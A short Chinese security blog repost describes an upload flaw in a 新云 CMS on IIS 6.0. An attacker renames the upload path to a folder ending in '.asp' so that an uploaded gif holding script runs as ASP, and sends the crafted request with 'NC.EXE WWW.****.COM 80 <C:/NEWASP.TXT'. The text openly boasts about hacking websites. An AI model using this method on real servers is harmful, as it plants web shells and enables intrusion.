鬼仔注:刚在H4x0r那里看到的,很简单的英文,不会英文的,根据里面几个URL和关键字也应该能看出来什么意思,必须要求IIS 6.0,跟前段时间动易那个一样,利用Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷。不过新云的这个好像需要用NC提交,以达到修改上传路径的目的。
来源:H4x0r's Blog
HACK..
JUST,DO.IT!
I LOVE HACKED DOWN WEBSITE. HOHO~~~~~
This is BUG Only For > IIS 6.0 (Windows 2003 )
EXPLIOT:
HTTP://WWW.****.COM/(UPLOAD.ASP)
You can change upload is filepath…. -_-!!
(exmple:upload/2007148685.gif)
changed upload/qq148685.asp/200714865.gif
200714865.gif is your eval javscrpit !
In the end
NC.EXE WWW.****.COM 80 <C:/NEWASP.TXT
HOHO~~~~
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论